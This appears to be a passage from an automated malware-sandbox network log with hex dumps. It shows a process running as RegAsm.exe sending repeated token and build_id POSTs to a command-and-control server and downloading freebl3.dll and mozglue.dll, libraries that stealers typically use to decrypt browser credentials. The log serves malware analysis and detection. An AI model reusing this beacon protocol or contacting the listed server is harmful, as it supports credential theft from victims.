2024-09-21 16:51:38 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:41 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFIJJEBKEBFCBGDAEGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:41 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 4a 4a 45 42 4b 45 42 46 43 42 47 44 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 4a 4a 45 42 4b 45 42 46 43 42 47 44 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 4a 4a 45 42 4b 45 42 46 43 42 47 44 41 45 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------FBFIJJEBKEBFCBGDAEGDContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------FBFIJJEBKEBFCBGDAEGDContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------FBFIJJEBKEBFCBGDAEGDCont
2024-09-21 16:51:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:42 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:42 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------JJJDGIECFCAKKFHIIIJECont
2024-09-21 16:51:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:43 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:43 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:43 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 43 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------IIIDAKJDHJKFHIEBFCGHContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------IIIDAKJDHJKFHIEBFCGHCont
2024-09-21 16:51:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:44 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:44 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------IDBKKKKKFBGDGDHIDBGHCont
2024-09-21 16:51:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:45 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:45 UTC	199	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:45 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:45 GMT Content-Type: application/octet-stream Content-Length: 685392 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 16:51:45 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-09-21 16:51:45 UTC	16384	IN	Data Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f Data Ascii: E}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f Data Ascii: EEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
2024-09-21 16:51:46 UTC	16384	IN	Data Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 Data Ascii: ,0<48%8A)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:47 UTC	199	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:47 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:47 GMT Content-Type: application/octet-stream Content-Length: 608080 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
